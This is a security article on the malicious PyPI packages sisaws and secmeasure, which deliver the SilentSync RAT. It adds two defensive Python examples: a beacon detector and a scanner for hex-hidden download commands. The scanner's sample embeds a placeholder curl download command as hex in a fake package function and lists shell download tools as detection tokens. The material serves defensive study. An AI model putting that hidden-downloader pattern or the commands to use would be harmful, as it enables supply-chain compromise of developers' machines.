Zscaler ThreatLabz has uncovered yet another supply chain attack against the Python Package Index (PyPI). In August 2025, researchers identified two malicious packages—sisaws and secmeasure—that masqueraded as legitimate libraries while delivering a Python-based Remote Access Trojan (RAT) dubbed SilentSync.
ThreatLabz explained, “In July 2025, a malicious Python package named termncolor was identified. Just a few weeks later, on August 4, 2025, ThreatLabz uncovered two more malicious Python packages named sisaws and secmeasure.” Both packages were authored by the same actor and distributed through PyPI.
While sisaws was designed to impersonate Argentina’s official healthcare integration package sisa, the secmeasure package posed as a security utility. Both contained hidden functions that, when invoked, downloaded and executed SilentSync from Pastebin.
According to Zscaler’s analysis, “SilentSync is capable of remote command execution, file exfiltration, and screen capturing. SilentSync also extracts web browser data, including credentials, history, autofill data, and cookies from web browsers like Chrome, Brave, Edge, and Firefox.”

SilentSync includes persistence mechanisms for multiple platforms, although the malicious PyPI packages currently only infect Windows systems. ThreatLabz observed that:
- On Windows, SilentSync creates registry entries to auto-run at startup.
- On Linux, it uses crontab @reboot directives.
- On macOS, it leverages LaunchAgents.
The RAT communicates with its command-and-control (C2) server via HTTP, using periodic beaconing and task polling. The researchers noted, “SilentSync communicates with a command-and-control (C2) server using HTTP, with periodic beaconing and task polling.”
Supported commands include:
- cmd: Execute arbitrary shell commands.
- get: Exfiltrate files or entire directories.
- screenshot: Capture desktop screenshots.
- browserdata: Steal sensitive data from web browsers.
Notably, when exfiltrating directories, the RAT compresses them into ZIP archives before uploading.
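The periodic beaconing and task polling described above is exactly the traffic pattern a defender can hunt for in web proxy logs. The following detector is an added example written for this article; it is not Zscaler's code and it does not reproduce any SilentSync indicator. It assumes a simple space-separated log format (timestamp, client IP, method, URL) and constructed sample lines in which one client polls a placeholder host about once a minute between ordinary browsing requests. Regularity is scored with the coefficient of variation of the gaps between requests, so bursty human traffic is ignored while a fixed-interval poll stands out.

```python
from collections import defaultdict
from datetime import datetime, timezone
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Constructed proxy log lines (not from the report): timestamp, client, method, URL.
# 10.0.0.5 polls c2.invalid roughly every 60 s, interleaved with ordinary browsing.
SAMPLE_LOG = """\
2025-08-04T10:00:00Z 10.0.0.5 GET http://c2.invalid/poll
2025-08-04T10:00:01Z 10.0.0.5 GET http://news.example/index.html
2025-08-04T10:01:00Z 10.0.0.5 GET http://c2.invalid/poll
2025-08-04T10:01:37Z 10.0.0.5 GET http://news.example/article/1
2025-08-04T10:02:01Z 10.0.0.5 GET http://c2.invalid/poll
2025-08-04T10:03:00Z 10.0.0.5 GET http://c2.invalid/poll
2025-08-04T10:03:59Z 10.0.0.5 GET http://c2.invalid/poll
2025-08-04T10:05:00Z 10.0.0.5 GET http://c2.invalid/poll
2025-08-04T10:09:12Z 10.0.0.5 GET http://news.example/article/2
2025-08-04T10:14:40Z 10.0.0.5 GET http://news.example/article/3
"""


def parse_line(line):
    """Split one log line (assumed format) into (timestamp, client, host)."""
    ts, client, _method, url = line.split()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return when, client, urlsplit(url).hostname


def find_beacons(lines, min_requests=5, max_cv=0.2):
    """Return (client, host) pairs whose request gaps are nearly constant.

    Regularity is the coefficient of variation of the gaps (standard deviation
    divided by mean). A fixed polling loop scores near zero; human browsing is
    bursty and scores well above max_cv. Pairs with fewer than min_requests
    requests are skipped because too few gaps make the statistic meaningless.
    """
    series = defaultdict(list)
    for line in lines:
        if line.strip():
            when, client, host = parse_line(line)
            series[(client, host)].append(when)

    beacons = []
    for (client, host), times in series.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = mean(gaps)
        if period <= 0:
            continue
        cv = pstdev(gaps) / period
        if cv <= max_cv:
            beacons.append({
                "client": client,
                "host": host,
                "requests": len(times),
                "period_s": round(period, 1),
                "cv": round(cv, 3),
            })
    return beacons


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG.splitlines()):
        print(hit)
```

On the sample, only the c2.invalid series is reported (six requests, a 60 s period, cv about 0.015). Implants that add random jitter to their sleep raise the cv, so in practice max_cv is tuned against a baseline of the environment's own traffic rather than fixed at 0.2.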
The sisaws package carefully mimicked Argentina’s healthcare API integrations. ThreatLabz reported, “The sisaws package superficially mimics the behavior of the legitimate modules (puco and renaper)… At a very quick glance, the sisaws package appears to be a legitimate Python library to interface with Argentina’s healthcare services.”
However, its __init__.py file contained a malicious function (gen_token) that issued fake API-like responses when provided with a hardcoded token. This function then decoded a hex string into a curl command to fetch and execute SilentSync.
The secmeasure package pretended to be a simple string-cleaning library, even offering legitimate-looking functions such as strip_whitespace and escape_html. But as ThreatLabz noted, “Similar to sisaws, the secmeasure initialization script contains a malicious function named sanitize_input, that when invoked, will execute the same hex-encoded curl command used by the sisaws package to distribute SilentSync RAT.”
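Both packages hide their downloader as a hex string that is decoded at call time, a pattern that package-review tooling can catch statically without executing anything. The scanner below is an added example for this article, not code from Zscaler or from the packages themselves. It parses a Python file with the standard `ast` module, decodes every string constant that looks like hex, and flags those that decode to printable text containing a shell download token such as `curl ` or `wget `. The embedded sample `__init__.py` is constructed for the demonstration: its function names echo the article, but the token and the URL (`paste.invalid`) are placeholders and the hex literal is generated from that placeholder command.

```python
import ast
import re
from dataclasses import dataclass

# Substrings that, once a hex literal is decoded, indicate a download-and-run command.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "powershell", "bash -c", "sh -c", "pastebin")
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
MIN_HEX_LEN = 16  # shorter literals are usually ids, colours or magic numbers


@dataclass
class Finding:
    lineno: int
    decoded: str
    matched: tuple


def decode_hex_literal(text):
    """Return the decoded text if `text` is a hex string that decodes to printable
    UTF-8, otherwise None. Hashes and random keys fail either the UTF-8 decode or
    the printable check, which keeps ordinary hex constants out of the results."""
    if len(text) < MIN_HEX_LEN or len(text) % 2 or not HEX_RE.match(text):
        return None
    try:
        decoded = bytes.fromhex(text).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded.isprintable() else None


def scan_source(source):
    """Walk the AST of one Python file and report hex string constants that decode
    to a shell-style download command. Adjacent literals ("ab" "cd") are already
    joined by the parser, so a command split across pieces is still seen whole."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Constant) and isinstance(node.value, str)):
            continue
        decoded = decode_hex_literal(node.value)
        if decoded is None:
            continue
        matched = tuple(t for t in SUSPICIOUS_TOKENS if t in decoded.lower())
        if matched:
            findings.append(Finding(node.lineno, decoded, matched))
    return findings


# Constructed stand-in for a package __init__.py (not the real sisaws/secmeasure
# code): one benign helper and one function that hides a command in a hex literal.
# The token and the URL are placeholders; the hex is generated from PLACEHOLDER_CMD.
PLACEHOLDER_CMD = "curl -sL https://paste.invalid/raw/PLACEHOLDER -o /tmp/stage.py"
SAMPLE_INIT = f'''
import html

def strip_whitespace(text):
    return text.strip()

def sanitize_input(text, token=None):
    if token == "PLACEHOLDER-TOKEN":
        payload = "{PLACEHOLDER_CMD.encode().hex()}"
        return payload
    return html.escape(text)
'''


if __name__ == "__main__":
    for finding in scan_source(SAMPLE_INIT):
        print(f"line {finding.lineno}: {finding.matched} -> {finding.decoded}")
```

Run against the sample, the scanner reports a single finding on the `payload` line and shows the decoded command, while the benign `strip_whitespace` helper and the non-hex token string produce nothing. The same approach extends to base64 literals by swapping the decoder, and it is cheap enough to run over every file of a wheel or sdist before it is admitted to an internal index.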